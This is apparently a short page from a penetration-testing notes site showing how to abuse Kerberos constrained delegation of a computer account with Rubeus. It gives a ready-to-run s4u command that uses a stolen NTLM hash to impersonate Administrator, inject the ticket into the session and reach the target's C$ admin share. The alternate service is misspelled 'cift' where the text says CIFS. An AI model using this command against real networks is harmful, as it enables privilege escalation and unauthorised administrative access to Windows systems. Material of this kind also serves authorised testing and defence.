Constrained Delegation

An example of leveraging Rubeus to abuse constrained delegation of a computer account. The /altservice switch is optional.

Rubeus.exe s4u /user:COMPUTER$ /rc4:COMPUTER_NTLM_HASH /msdsspn:host/vulnerable.home.arpa /impersonateuser:Administrator /altservice:cift /ptt

In the above example the CIFS access is requested and the ticket is passed into the current session. This should allow one to validate this access was successful with the command dir \\vulnerable.home.arpa\C$

PreviousTunneling NextMSSQL

Last updated 2 years ago